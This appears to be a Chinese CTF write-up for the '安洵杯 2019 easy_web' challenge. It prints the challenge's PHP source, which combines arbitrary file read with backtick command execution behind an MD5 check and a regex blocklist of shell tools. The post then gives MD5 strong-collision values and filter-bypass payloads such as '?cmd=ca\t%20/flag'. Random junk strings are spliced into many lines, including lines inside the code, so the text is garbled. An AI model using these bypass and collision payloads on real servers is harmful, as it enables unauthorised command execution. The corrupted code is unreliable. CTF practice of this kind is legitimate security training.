[安洵杯 2019]easy_web

admin

/ C8 L" o/ K" }1 u5 [( y9 f6 s<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
9 m$ L& m" K2 `1 i( m: P- V& D<p>&nbsp;</p>
# ~& k" h0 l" r# j; y  t<p>&nbsp;</p>
<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
* j: K3 v5 \$ r  H<p>&nbsp;</p>
<p>&nbsp;</p>
- s- F" |0 S$ h  @2 P* D<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
( [3 w/ C" w1 i. Q3 [<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
<p>首先把那个进行一次base64位解码</p>
8 t' U' f; U" B0 E6 G: `) ~/ f' c<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
$ D0 n9 S# M  }& j" Z<p>&nbsp;</p>
9 a7 I, c, P' R% L4 M, y- z8 e<p>&nbsp;</p>
<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
4 C3 x! u8 |* p8 s7 ?2 K<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
2 R1 L4 F6 X- \5 Z5 a9 x<p>&nbsp;</p>
! s0 p/ o( W7 q<p>&nbsp;</p>
3 N& M: t4 j$ W$ ]3 E5 j* m3 V, w: J<p>&nbsp;然后用hex解码一下得到了</p>
<div class="cnblogs_Highlighter">
* C. X# i6 {- ?9 _9 k0 L" Q; ?8 w9 z, i<pre class="brush:sql;gutter:true;">555.png
</pre>
</div>
<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
/ V6 g& r8 _2 ~& |% o% z- M<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
</pre>
</div>
& Q8 \* t( ~; Y1 p% w( p. g<p>　　然后输入到地址栏</p>
<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
0 p, c  d9 J2 F3 e<div class="cnblogs_code">
' P5 A+ [/ w: v4 u<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
- s/ p2 x7 h( o, f1 l; Y1 ^2 i</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
" s2 Q6 ~+ D5 ^# t9 E</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));

</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
+ A3 s; p( K9 }3 c+ Y) p9 o} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
7 j! G  B! c  b! e2 r; L    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
' A4 [  Y# a* o5 h: h; n    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
8 m* y  R/ |# Q- ^' t</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
: I+ \9 m' f7 A        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
2 N5 T& M% i3 T3 m        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
) e6 z! J- B1 A; E1 l" J    }
}
6 v4 W4 `0 `+ Y; k! g
</span>?&gt;
&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
  body{
; e  T% l3 s$ D   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
- d) Y4 }" Q: [4 j   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
7 |5 [3 g8 T3 q- U6 z- p( r+ i  _<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
  P7 e  I. f) e) O&lt;body&gt;
; g1 o5 I* z  X3 B( L6 N&lt;/body&gt;
&lt;/html&gt;</pre>
! x0 k2 j) u) i& J5 f</div>
7 R; D' b6 ^( g) F6 k7 E- z* d<p>结合前面的推断，关键代码就在</p>
  j; O8 V- W4 K, g% h<div class="cnblogs_code">
1 W  F$ J+ c2 f1 k' M$ {<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
% V# O: ^9 k6 ~, ~* ]6 m    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
    }</span></pre>
/ @8 L& T$ D8 \! m, N</div>
( v; Z/ o8 s; M0 k! m<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
8 J3 m7 B/ j& k: c! f- B8 n</div>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
<p>于是采用payload:</p>
/ p  R' _4 }/ F3 O4 M0 S9 \/ _<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
<p>&nbsp;</p>
% ^: s9 p8 r( F* J( U, |<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
5 J4 k* w' \+ Y0 P<p>ls和l\s在命令执行的时候结果是一样的。</p>
<p>然后发现根目录里面有/flag</p>
<p>于是payload:</p>
<div class="cnblogs_Highlighter">
) y9 v+ b6 ?! E& o* V& {- s4 A! l* I; \<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
</pre>
" n; J' T: ?' b: t9 L</div>
<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
4 A0 p1 x' k' `; e2 c( H: [" l& ?  v  ]<p>&nbsp;</p>
. X) \  F# U+ d  u+ S# a1 F